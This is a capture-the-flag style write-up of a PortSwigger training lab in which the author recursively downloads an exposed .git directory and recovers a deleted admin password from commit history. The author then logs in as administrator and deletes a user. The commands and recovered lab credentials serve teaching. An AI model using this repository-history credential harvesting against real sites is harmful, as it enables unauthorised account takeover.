PortSwigger Lab: Information disclosure in version control history
Task
This lab discloses sensitive information via its version control history. To solve the lab, obtain the password for the administrator user then log in and delete the user carlos.
Attempt
I was able to access https://ID.web-security-academy.net/.git. Under .git/COMMIT_EDITMSG I found a message ‘Remove admin password from config’.
As the message said, there was no password in config:
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[user]
email = [email protected]
name = Carlos Montoya
I downloaded the entire git directory for further inspection:
wget -r https://0aa400fb0385876c84a7827d00b000b8.web-security-academy.net/.git
-r option means recursive so it will download all the files.
git status showed admin.conf had been deleted:
❯ git status
On branch master
Changes not staged for commit:
(use "git add/rm <file>..." to update what will be committed)
(use "git restore <file>..." to discard changes in working directory)
deleted: admin.conf
deleted: admin_panel.php
no changes added to commit (use "git add" and/or "git commit -a")
` git diff`:
diff --git a/admin.conf b/admin.conf
deleted file mode 100644
index 21d23f1..0000000
--- a/admin.conf
+++ /dev/null
@@ -1 +0,0 @@
-ADMIN_PASSWORD=env('ADMIN_PASSWORD')
diff --git a/admin_panel.php b/admin_panel.php
deleted file mode 100644
index 8944e3b..0000000
--- a/admin_panel.php
+++ /dev/null
@@ -1 +0,0 @@
-<?php echo 'TODO: build an amazing admin panel, but remember to check the password!'; ?>
\ No newline at end of file
(END)
I couldn’t find the password in diff.
git log -- admin.conf:
commit 03447d4a0f9c1d069facab65709c8c0e816204be (HEAD -> master)
Author: Carlos Montoya <[email protected]>
Date: Tue Jun 23 14:05:07 2020 +0000
Remove admin password from config
commit 5010e5069a579076e121b6df94ae6dfbd4f7db47
Author: Carlos Montoya <[email protected]>
Date: Mon Jun 22 16:23:42 2020 +0000
Add skeleton admin panel
See the older commit by git show 5010e5069a579076e121b6df94ae6dfbd4f7db47:admin.conf. This revealed the password ADMIN_PASSWORD=rp2br7ahdpc0hm4rmrwe. Logged in as admin with the credentials administrator:rp2br7ahdpc0hm4rmrwe. Deleted carlos.
Byebye Carlos and now the lab’s completed.